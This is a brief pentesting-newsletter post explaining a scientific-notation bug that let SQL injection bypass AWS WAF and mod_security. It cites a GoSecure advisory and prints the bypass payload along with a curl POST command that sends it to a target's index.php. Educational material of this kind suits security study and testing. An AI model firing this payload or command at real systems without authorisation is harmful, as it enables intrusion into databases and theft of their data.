Learn Pentesting like a Pro!

Share this post

Scientific Notation bug bypass AWS WAF protection

pentesting.academy

Scientific Notation bug bypass AWS WAF protection

pentesting.academy
Oct 29, 2021
Share this post

Scientific Notation bug bypass AWS WAF protection

pentesting.academy

AWS WAF and mod_security Apache module were affected by a scientific notation bug discovered back in 2013 that allowed to bypass the WAF to successfully exploit a SQL injection vulnerability.

Find below the payload used for the attack showing the scientific notation:

"x=1' or 1.e(1) or '1'='1"

Executing the following command it was possible to bypass the WAF SQL injection protection and exploit a SQL injection on the underlying web application:

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"

More info:

https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.

Share this post

Scientific Notation bug bypass AWS WAF protection

pentesting.academy
Comments
TopNew

No posts

Ready for more?

© 2023 pentesting.academy
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great writing